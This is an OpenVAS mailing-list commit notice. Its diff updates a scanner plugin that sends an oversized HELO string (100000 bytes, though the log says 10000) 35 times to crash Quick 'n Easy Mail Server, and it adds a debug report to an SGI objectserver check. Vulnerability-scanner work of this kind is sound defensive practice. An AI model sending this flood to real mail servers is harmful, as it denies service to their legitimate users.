[Openvas-commits] r3386 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Fri May 15 16:08:32 CEST 2009


Author: chandra
Date: 2009-05-15 16:08:24 +0200 (Fri, 15 May 2009)
New Revision: 3386

Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/quick_easy_mail_server_34814.nasl
   trunk/openvas-plugins/scripts/remote-sgi-objectserver.nasl
Log:
crap length increased to 10000.

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2009-05-15 13:43:07 UTC (rev 3385)
+++ trunk/openvas-plugins/ChangeLog	2009-05-15 14:08:24 UTC (rev 3386)
@@ -1,3 +1,7 @@
+2009-05-15 Chandan S <schandan at secpod.com>
+	* quick_easy_mail_server_34814.nasl:
+	Updated the crap length.
+
 2009-05-14 Michael Meyer <mime at gmx.de>
 	* scripts/FormMail_34929.nasl,
 	scripts/squirrelmail_1_4_18.nasl,

Modified: trunk/openvas-plugins/scripts/quick_easy_mail_server_34814.nasl
===================================================================
--- trunk/openvas-plugins/scripts/quick_easy_mail_server_34814.nasl	2009-05-15 13:43:07 UTC (rev 3385)
+++ trunk/openvas-plugins/scripts/quick_easy_mail_server_34814.nasl	2009-05-15 14:08:24 UTC (rev 3386)
@@ -7,6 +7,8 @@
 # Authors
 # Michael Meyer
 #
+# Increased crap length to 10000 (By Michael Meyer, 2009-05-15)
+#
 # Copyright:
 # Copyright (c) 2009 Michael Meyer
 #
@@ -42,7 +44,7 @@
   to reject SMTP requests, denying service to legitimate users.
 
   The demonstration release of Quick 'n Easy Mail Server 3.3 is
-  vulnerable; other versions may also be affected. 
+  vulnerable; other versions may also be affected.
 
  See also:
   http://www.securityfocus.com/bid/34814
@@ -59,49 +61,51 @@
  exit(0);
 }
 
+
 include("smtp_func.inc");
 
-if ( safe_checks() ) exit(0);
+if(safe_checks()){
+  exit(0);
+}
 
 port = get_kb_item("Services/smtp");
-if (!port) port = 25;
+if(!port){
+  port = 25;
+}
 
-if (get_port_state(port))
+if(get_port_state(port))
 {
- soctcp25 = open_sock_tcp(port);
+  soctcp25 = open_sock_tcp(port);
+  if (soctcp25)
+  {
+    bannertxt = smtp_recv_banner(socket:soctcp25);
+    if(!bannertxt)
+    {
+      close(soctcp25);
+      exit(0);
+    }
 
- if (soctcp25)
- {
-  bannertxt = smtp_recv_banner(socket:soctcp25);
+    if(!("Quick 'n Easy Mail Server" >< bannertxt))
+    {
+      close(soctcp25);
+      exit(0);
+    }
 
-  if(!bannertxt){
-        close(soctcp25);
+    close(soctcp25);
+    data = string("HELO ");
+    data += crap(length: 100000, data:"OpenVAS at openvas.org");
+    data += string("\r\n");
+    for(i=0; i<35; i++)
+    {
+      soctcp = open_sock_tcp(port);
+      send(socket:soctcp, data:data);
+      ehlotxt = smtp_recv_line(socket:soctcp);
+      if(egrep(pattern:"421 Service not available", string: ehlotxt))
+      {
+        security_warning(port:port);
+        close(soctcp);
         exit(0);
+      }
+    }
   }
-
-  if( ! ("Quick 'n Easy Mail Server" >< bannertxt)) {
-		close(soctcp25);
-		exit(0);
-  }
-
-  close(soctcp25);
-  data = string("HELO OpenVAS at openvas.org\r\n");
-
-  for(i=0; i<35; i++) {
-
-    soctcp = open_sock_tcp(port);
-    send(socket:soctcp, data:data);
-    ehlotxt = smtp_recv_line(socket:soctcp);
-    
-    if(egrep(pattern:"421 Service not available", string: ehlotxt)) {
-	security_warning(port:port);
-	close(soctcp);
-	exit(0);
-    }  
-  }  
- }
 }
-
-close(soctcp);
-exit(0);
-

Modified: trunk/openvas-plugins/scripts/remote-sgi-objectserver.nasl
===================================================================
--- trunk/openvas-plugins/scripts/remote-sgi-objectserver.nasl	2009-05-15 13:43:07 UTC (rev 3385)
+++ trunk/openvas-plugins/scripts/remote-sgi-objectserver.nasl	2009-05-15 14:08:24 UTC (rev 3386)
@@ -78,6 +78,7 @@
 for (i = 0; i < 2; i ++)       # Try twice
 {
 	rep = send_packet(u, pcap_active:TRUE, pcap_filter:filter, pcap_timeout:1);
+	security_note(data:"REP: " + rep);
 	if(rep) {
 		gotresp = 1;
 		data = get_udp_element(udp: rep, element:"data"); 



More information about the Openvas-commits mailing list